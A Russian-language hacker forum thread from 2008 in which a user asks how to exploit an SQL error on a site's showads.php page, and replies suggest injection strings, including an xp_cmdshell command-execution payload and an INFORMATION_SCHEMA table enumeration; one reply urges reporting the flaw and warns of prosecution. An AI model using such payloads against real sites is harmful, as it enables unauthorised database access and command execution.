Sql injection

$HiTman$

Guest

Это нравится:0 Да/0 Нет

08.11.2008 00:07:42

При вводе в адресную строку http://www.target.ru/showads.php?page=1&city=4&sc=2&gr=1'&sg=1&str=&countsel=0&x=48&y=17
выводит ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')and(A.SUBGROUP_ID=)) ORDER BY Upper(A.TEXTADSF) LIMIT 0, 15' at line 8
подскажите возможноли выполнение SQL injection если да то как моно заюзать эту багу??????

Dark Angel Guest	#2 Это нравится:0 Да/0 Нет 10.11.2008 10:12:39 http://www.target.ru/showads.php?page...&sc=2&gr=1) and 1=1--

bs0d

Guest

Это нравится:0 Да/0 Нет

10.11.2008 18:16:00

Цитата
Dark Angel пишет: http://www.target.ru/showads.php?page...&sc=2&gr=1) and 1=1--

помоему нехватает еще скобочги =)))
чтото типа етого
gr=1) and (1=1))--
а еще лучше бы линк посмареть -_-
да думаю бы непомешало проверить и следующие варианты:
gr=1));exec master..xp_cmdshell 'dir c:\'--
или
gr=1)+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
поэкспериментируй со скобками

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

12.11.2008 12:15:43

Цитата
bs0d пишет: gr=1));exec master..xp_cmdshell 'dir c:\'--илиgr=1)+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--

Какой к чёрту шелл и INFORMATION_SCHEMA.TABLES ??? Посмотри внимательней на текст ошибки: там что-нибудь говорится про MSSQL?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Phoenix

Guest

Это нравится:0 Да/0 Нет

12.11.2008 13:14:25

mysql там, судя по ошибке.
И похоже, это классическая SQL инъекция. то есть:

Цитата
$HiTman$ пишет: подскажите возможноли выполнение SQL injection

Да.

Цитата
$HiTman$ пишет: как моно заюзать эту багу??????

ну, можно например уведомить администратора о существовании уязвимости, чтоб не дай баг какой нить "хакер" не наткнулся на нее, не сделал чего нить нехорошего, а потом уже по отработанной схеме - отдел К, изъятие компьютера, уголовное дело, суд, два года условно.

Stierus

Guest

Это нравится:0 Да/0 Нет

12.11.2008 14:43:15

Цитата
Shanker пишет: Цитатаbs0d пишет: gr=1));exec master..xp_cmdshell 'dir c:\'--илиgr=1)+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--Какой к чёрту шелл и INFORMATION_SCHEMA.TABLES ??? Посмотри внимательней на текст ошибки: там что-нибудь говорится про MSSQL?

ну а в mysql нет INFORMATION_SCHEMA.TABLES по-твоему (в актуальных версиях) или что ты хотел этим сказать ?

Изменено: Stierus - 12.11.2008 14:46:40

bs0d Guest	#7 Это нравится:0 Да/0 Нет 12.11.2008 15:17:21 Shanker da ladno tebe krichat! ya ne vnimatelnaya bila togda! prosta v tot moment kak raz zanimalas MSSQL!

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

13.11.2008 01:57:32

Цитата
Stierus пишет: ну а в mysql нет INFORMATION_SCHEMA.TABLES по-твоему (в актуальных версиях) или что ты хотел этим сказать ?

Да, здесь я несколько не прав: думал, что в актуальных версиях называется по-другому... Но гугл подтвердил, что так же

bs0d,
Надеюсь, что так оно и есть. А то бывают тут всякие на форуме, которые вместо того, чтоб знаниями делиться просто результат гугла тупо выкидывают - типа "посмотрите какой я мега крутой спец, я всё знаю"

Изменено: Shanker - 13.11.2008 01:57:54

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?